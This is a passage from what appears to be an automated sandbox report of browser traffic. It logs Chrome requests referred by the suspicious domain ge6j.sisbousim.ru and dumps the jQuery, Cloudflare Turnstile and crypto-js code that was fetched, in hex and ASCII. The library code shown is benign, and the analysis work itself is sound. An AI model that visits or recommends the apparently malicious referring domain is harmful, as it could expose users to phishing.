                                                                              Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                              Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                              Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                              2024-10-03 01:13:56 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                              Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.449765104.18.95.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:55 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://ge6j.sisbousim.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:56 UTC356INHTTP/1.1 302 Found
                                                                              Date: Thu, 03 Oct 2024 01:13:56 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                              cross-origin-resource-policy: cross-origin
                                                                              location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc9128ce82042da-EWR


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.449768104.18.95.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:56 UTC648OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://ge6j.sisbousim.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:56 UTC441INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:56 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47262
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc91290d8874231-EWR
                                                                              2024-10-03 01:13:56 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                              Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                              Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                              Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                              Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                              Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                              Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                              Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                              Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                              Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.449769104.17.24.144438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:56 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                              Host: cdnjs.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:56 UTC934INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:56 GMT
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=30672000
                                                                              ETag: W/"61182885-40eb"
                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                              cf-cdnjs-via: cfworker/kv
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Timing-Allow-Origin: *
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: HIT
                                                                              Age: 529538
                                                                              Expires: Tue, 23 Sep 2025 01:13:56 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qgyIxYa%2BXzHdc%2BshFATf7Q0OevAhz7%2FrqsrBsq6juwPEsFU4%2FJhcpU7JXIXqoIt5zPiUU8NA%2F0bSj9JP3qV8nt7cpnDtuv5%2F8WsEhpaBzileKs8vyN52avamTepMDzEN6Vzgo9Ea"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=15780000
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912915bd84207-EWR
                                                                              2024-10-03 01:13:56 UTC435INData Raw: 37 62 66 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                              Data Ascii: 7bf9!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65
                                                                              Data Ascii: crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e
